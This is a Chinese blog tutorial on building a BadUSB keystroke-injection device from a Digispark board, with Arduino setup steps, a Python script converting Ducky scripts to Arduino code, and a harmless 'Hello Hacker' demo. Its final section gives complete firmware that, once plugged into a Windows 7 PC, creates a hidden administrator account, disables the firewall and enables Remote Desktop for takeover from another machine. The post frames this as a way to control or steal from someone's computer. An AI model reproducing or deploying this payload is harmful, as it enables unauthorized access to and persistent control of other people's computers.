U盘攻击：无视防火墙-3秒黑掉你的电脑|BadUSB-制作教程

最新推荐文章于 2023-08-04 11:30:00 发布

weixin_35736002

最新推荐文章于 2023-08-04 11:30:00 发布

阅读量4.9k

点赞数 4

本文链接：https://blog.csdn.net/weixin_35736002/article/details/103930254

版权

U盘攻击：无视防火墙-3秒黑掉你的电脑|BadUSB-制作教程

BadUSB简介

吾旧友，拾U盘,彼异之，插PC，遂上线。这个愚蠢精彩故事不禁让我萌生学习制作一个BadUSB的想法，为了贴合实际，特地从某宝入手了一个BadUSB板，如下图所示。

简单来说，通过硬件直接插入对方电脑，让对方电脑执行代码，达到控制主机或者窃取信息等目的(需要自行发挥想象)

准备工具

一个BadUSB_Rubber_Ducky(橡皮鸭)

Arduino的IDE - 下载地址：(https://www.arduino.cc/en/Main/Software)

DPinst64驱动(根据电脑型号来,普遍都是64位操作系统)

安装工具

Arduino的安装就不讲了，傻瓜式安装:安装包 - 下一步 - 完成！

DPinst64驱动安装的时候要选择始终信任来自Digistump LLC - 安装 - 下一步 - 完成！

Arduino环境配置

首先打开Arduino - 文件 - 首选项 - 附加开发板管理器网址:

http://digistump.com/package_digistump_index.json

在工具 - 开发板管理器 - 先等待它下载完文件:

接着在类型下拉菜单里有一个贡献然后选择Digistump_AVR安装完毕就Ok

最后选择开发板对应的开发板型号和编程器然后选择Keyboard一个模板：

代码编写

这是它示例的代码：

#include "DigiKeyboard.h"

void setup() {
  // don't need to set anything up to use DigiKeyboard
}


void loop() {
  // this is generally not necessary but with some older systems it seems to
  // prevent missing the first character after a delay:
  DigiKeyboard.sendKeyStroke(0);
  
  // Type out this string letter by letter on the computer (assumes US-style
  // keyboard)
  DigiKeyboard.println("Hello Power_Liu");
  
  // It's better to use DigiKeyboard.delay() over the regular Arduino delay()
  // if doing keyboard stuff because it keeps talking to the computer to make
  // sure the computer knows the keyboard is alive and connected
  DigiKeyboard.delay(5000);
}

上传烧录:

提示:Running Digispark Uploader…Plug in device now… (will timeout in 60 seconds)

这个时候需要60s的时间插入你的BadUSB:

提示： Micronucleus done. Thank you! 说明已经上传成功！这个时候插入BadUSB它会一直输入Hello Power_Liu直到拔掉为止:

手把手教你写一个”Hello Hacker!”

1、先在记事本中写好我们的代码 - 另存为 hacker.txt:

//这个代码的意思就是打开cmd，然后输出Hello Hacker!
DELAY 5000
GUI r 
DELAY 500
STRING cmd
DELAY 500
ENTER
ENTER
DELAY 1000
STRING Hello Hacker!
DELAY 1500 
ENTER
ENTER

2、使用我们的Python转换脚本吧hacker.txt转换为ino文件：

Duckyspark_translator.py hacker.txt hacker

Python转换脚本源代码:

# -*- coding:utf-8 -*-

from __future__ import print_function
import sys

payload_input = ''
l='//'
mod_input=''
mod_output=''

def replacement():
    print ('DigiKeyboard.', end ='')
    print(
str(l.replace(' a', 'KEY_A').replace(' a ', 'KEY_A')
.replace(' b', 'KEY_B')
.replace(' c', 'KEY_C')
.replace(' d', 'KEY_D')
.replace(' e', 'KEY_E')
.replace(' f', 'KEY_F')
.replace(' g', 'KEY_G')
.replace(' h', 'KEY_H')
.replace(' i', 'KEY_I')
.replace(' j', 'KEY_J')
.replace(' k', 'KEY_K')
.replace(' l', 'KEY_L')
.replace(' m', 'KEY_M')
.replace(' n', 'KEY_N')
.replace(' o', 'KEY_O')
.replace(' p', 'KEY_P')
.replace(' q', 'KEY_Q')
.replace(' r', 'KEY_R')
.replace(' s', 'KEY_S')
.replace(' t', 'KEY_T')
.replace(' u', 'KEY_U')
.replace(' v', 'KEY_V')
.replace(' w', 'KEY_W')
.replace(' x', 'KEY_X')
.replace(' y', 'KEY_Y')
.replace(' z', 'KEY_Z')

#1-0 if needed

#f1-f12
.replace(' F1','KEY_F1')
.replace(' F2','KEY_F2')
.replace(' F3','KEY_F3')
.replace(' F4','KEY_F4')
.replace(' F5','KEY_F5')
.replace(' F6','KEY_F6')
.replace(' F7','KEY_F7')
.replace(' F8','KEY_F8')
.replace(' F9','KEY_F9')
.replace(' F10','KEY_F10')
.replace(' F11','KEY_F11')
.replace(' F12','KEY_F12')
#arrows 
.replace('LEFTARROW', 'KEY_ARROW_LEFT')
.replace('RIGHTARROW', 'KEY_ARROW_RIGHT')
.replace('UPARROW','KEY_ARROW_UP')
.replace('DOWNARROW','KEY_ARROW_DOWN')
.replace('LEFT', 'KEY_ARROW_LEFT')
.replace('RIGH', 'KEY_ARROW_RIGHT')
.replace('UP','KEY_ARROW_UP')
.replace('DOWN','KEY_ARROW_DOWN')
#keys
.replace('PRINTSCREEN','sendKeyStroke(KEY_PRT_SCR' )
.replace('TAB', 'sendKeyStroke(KEY_TAB')
.replace('SPACE', 'sendKeyStroke(KEY_SPACE')
.replace('CONTROL ALT','sendKeyStroke(MOD_ALT_RIGHT,')
.replace('CTRL ALT','sendKeyStroke(MOD_ALT_RIGHT,')
.replace('ESCAPE','sendKeyStroke(KEY_ESC' )
.replace('ENTER','sendKeyStroke(KEY_ENTER')),end = '')
    print(');')

def modreplacement():
    print ('DigiKeyboard.', end ='')
    print('sendKeyStroke(', end = '')

    print(
str(l.replace (mod_input, '').replace(' a', 'KEY_A').replace(' a ', 'KEY_A')
.replace(' b', 'KEY_B')
.replace(' c', 'KEY_С')
.replace(' d', 'KEY_D')
.replace(' e', 'KEY_E')
.replace(' f', 'KEY_F')
.replace(' g', 'KEY_G')
.replace(' h', 'KEY_H')
.replace(' i', 'KEY_I')
.replace(' j', 'KEY_J')
.replace(' k', 'KEY_K')
.replace(' l', 'KEY_L')
.replace(' m', 'KEY_M')
.replace(' n', 'KEY_N')
.replace(' o', 'KEY_O')
.replace(' p', 'KEY_P')
.replace(' q', 'KEY_Q')
.replace(' r', 'KEY_R')
.replace(' s', 'KEY_S')
.replace(' t', 'KEY_T')
.replace(' u', 'KEY_U')
.replace(' v', 'KEY_V')
.replace(' w', 'KEY_W')
.replace(' x', 'KEY_X')
.replace(' y', 'KEY_Y')
.replace(' z', 'KEY_Z')

#1-0

#f1-f12
.replace(' F1','KEY_F1')
.replace(' F2','KEY_F2')
.replace(' F3','KEY_F3')
.replace(' F4','KEY_F4')
.replace(' F5','KEY_F5')
.replace(' F6','KEY_F6')
.replace(' F7','KEY_F7')
.replace(' F8','KEY_F8')
.replace(' F9','KEY_F9')
.replace(' F10','KEY_F10')
.replace(' F11','KEY_F11')
.replace(' F12','KEY_F12')

#arrows 
.replace('LEFTARROW', 'KEY_ARROW_LEFT')
.replace('RIGHTARROW', 'KEY_ARROW_RIGHT')
.replace('UPARROW','KEY_ARROW_UP')
.replace('DOWNARROW','KEY_ARROW_DOWN')
.replace('LEFT', 'KEY_ARROW_LEFT')
.replace('RIGH', 'KEY_ARROW_RIGHT')
.replace('UP','KEY_ARROW_UP')
.replace('DOWN','KEY_ARROW_DOWN')

.replace('PRINTSCREEN','sendKeyStroke(KEY_PRT_SCR' )
.replace('TAB', 'sendKeyStroke(KEY_TAB')
.replace('ESCAPE','KEY_ESC' )
.replace('SPACE', 'KEY_SPACE')
.replace(' ','')
.replace('ENTER','KEY_ENTER')),end = '')

    print(','+mod_output, end = '')                
    print(');')


#arguments
if len(sys.argv) == 2:
    try:
        payload_input = open(sys.argv[1], "r")
        sys.stdout = open("digipayload.ino", "w")
        z = len(open(sys.argv[1], "r").readlines())
    except IOError:
        print('\nError! File "'+sys.argv[1]+'" does not exist!\n' )
        exit()
elif len(sys.argv) == 3:
    try:
        payload_input = open(sys.argv[1], "r")
        sys.stdout = open(sys.argv[2]+'.ino', 'w')
        z = len(open(sys.argv[1], "r").readlines())
    except IOError:
        print('\nError!, File "'+sys.argv[1]+'" does not exist!\n' )
        exit()
elif len(sys.argv) > 3:
    print('Too much Arguments')
    exit()
else:    
    payload_input = open('payload.txt', "r")
    sys.stdout = open("digipayload.ino", "w")
    z = len(open('payload.txt', "r").readlines())

#--------------------------------------
#Digispark program fragment
print('//www.liuwx.cn&Qq211124332')
print('#include "DigiKeyboard.h"')
print('#define KEY_ESC     41')
print('#define KEY_BACKSPACE 42')
print('#define KEY_TAB     43')
print('#define KEY_PRT_SCR 70')
print('#define KEY_DELETE  76\n')

print('void setup() {\n')
print('DigiKeyboard.delay(5000);') #windows mozhet dolgo raspoznavat digispark potomu bylo resheno dobavlyat 5 sek delay vmesto 0.5sek
print('DigiKeyboard.sendKeyStroke(0);')
#---------------------------------------

for i in range(z):
    l = payload_input.readline().replace('\n', '')
    
    if len (l) < 1:
        print('', end = '')

    else:

        if 'REM' in l:
            print ('//', l)    
        
        else:
            if 'DELAY' in l:
                print ('DigiKeyboard.', end = '')
                print (l.replace('DELAY', 'delay(').replace(' ',''), end = '')
                print(');')
                        
            elif 'STRING' in l:
                print ('DigiKeyboard.', end = '')
                print (l.replace('"', '")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F("')
                       .replace('\\', '")); DigiKeyboard.print(char(92)); DigiKeyboard.print(F("')
                       .replace('STRING ','print(F("'), end = '')
                print ('")', end = '')
                print(');');
                
            elif (l == 'GUI') or (l == 'WINDOWS') or (l == 'CONTROL ESCAPE'):
                print('DigiKeyboard.sendKeyStroke(KEY_ESC,MOD_CONTROL_LEFT);')

            elif (l == 'GUI d') or (l == 'WINDOWS d'):
                print ('DigiKeyboard.sendKeyStroke(KEY_D,MOD_GUI_LEFT);')
            
            elif (l == 'WINDOWS r') or (l == 'GUI r'):
                print ('DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);')

            elif 'MENU' in l:
                print ('DigiKeyboard.sendKeyStroke(MOD_GUI_RIGHT);')
                
        #!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!INVERCE!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!    
            elif 'CTRL ALT' in l:
                replacement()
            elif 'ALT' in l:
                mod_input = 'ALT'
                mod_output = 'MOD_ALT_RIGHT'
                modreplacement()
            elif 'CTRL' in l:
                mod_input = 'CTRL'
                mod_output = 'MOD_CONTROL_LEFT'
                modreplacement()

            elif 'CONTROL' in l:
                mod_input = 'CONTROL'
                mod_output = 'MOD_CONTROL_LEFT'
                modreplacement()

        #!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!        
            else:
                replacement()

        if len(l) <1:
            print('', end = '')
#Digispark program fragment
print('\n}')
print('\n')
print('void loop() {\n')
print('}\n')
#-----------------------------------

payload_input.close()

转换完成后再当前目录下会有一个hacker.ino文件：

打开后的代码是这样的：

//www.liuwx.cn&Qq211124332
#include "DigiKeyboard.h"
#define KEY_ESC     41
#define KEY_BACKSPACE 42
#define KEY_TAB     43
#define KEY_PRT_SCR 70
#define KEY_DELETE  76

void setup() {

DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.print(F("cmd"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.print(F("Hello Hacker!"));
DigiKeyboard.delay(1500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);

}


void loop() {

}

3、上传脚本 - 插入BadUSB进行烧录程序:

上传成功后，它会自动执行我们的操作：会在屏幕上输出Hello Hacker！

插上U盘入侵局域网Win7登陆它的远程桌面

本来想写MSF + BadUSB 反弹Win7和Win10的Shell，但是百度上有了，我就没必要写在这篇文章了！

思路和主要步骤

1、在局域网中有一台PC-Win7系统

2、插上BadUSB关掉Win7的防火墙

3、创建一个HACKER的用户并提权为超级管理员

4、开启Win7的3389

5、局域网另一台电脑mstsc登陆Win7的桌面

命令注释

关闭防火墙的命令：netsh firewall set opmode mode=disable

打开Win7的3389命令：REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

至于我为什么会吧上面这条开3389的命令有些字母是大写又有些字母是小写：

reg add hklm\\system\\cURRENTcONTROLsET\\cONTROL\\tERMINAL\" \"sERVER /V FdENYtscONNECTIONS /T reg_dword /D 0 /F

因为插入BadUSB会首先按下我们的大写锁定!然后才执行命令，因为怕有的电脑有中午输入法！所以我上面的语句要这样写！他会吧小写的在DOS窗口输出为大写，大写的命令会输出为小写！

按下回车键：DigiKeyboard.sendKeyStroke(KEY_ENTER); 

延迟2秒执行（有的时候延迟时间短了会执行失败）：DigiKeyboard.delay(2000);

附上代码如下：

//www.liuwx.cn QQ211124332

#include "DigiKeyboard.h"
#define KEY_ESC     41
#define KEY_BACKSPACE 42
#define KEY_TAB     43
#define KEY_PRT_SCR 70
#define KEY_DELETE  76
#define KEY_CAPS_LOCK  0x39

void setup() {

DigiKeyboard.delay(2000);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(2000);
DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);
DigiKeyboard.sendKeyStroke(KEY_CAPS_LOCK);
DigiKeyboard.delay(500);
DigiKeyboard.print(F("cmd"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.print(F("color c"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(200);
DigiKeyboard.print(F("net user hacker Qliuwx123@ /add"));
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(300);
DigiKeyboard.print(F("net localgroup administrators hacker /add"));
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.print(F("netsh firewall set opmode mode=disable")); //关闭防火墙
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.print(F("reg add hklm\\system\\cURRENTcONTROLsET\\cONTROL\\tERMINAL\" \"sERVER /V FdENYtscONNECTIONS /T reg_dword /D 0 /F"));  //开3389
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);




}


void loop() {

}

具体演示的效果我放到了B站上：

插上U盘开启Win7的3389并关闭防火墙实施登陆它远程桌面

weixin_35736002

关注

4
点赞
踩
64

收藏

觉得还不错? 一键收藏
1
评论
U盘攻击：无视防火墙-3秒黑掉你的电脑|BadUSB-制作教程

U盘攻击：无视防火墙-3秒黑掉你的电脑|BadUSB-制作教程 BadUSB简介吾旧友，拾U盘,彼异之，插PC，遂上线。这个愚蠢精彩故事不禁让我萌生学习制作一个BadUSB的想法，为了贴合实际，特地从某宝入手了一个BadUSB板，如下图所示。简单来说，通过硬件直接插入对方电脑，让对方电脑执行代码，达到控制主机或者窃取信息等目的(需要自行发挥想象)准备工...
复制链接

扫一扫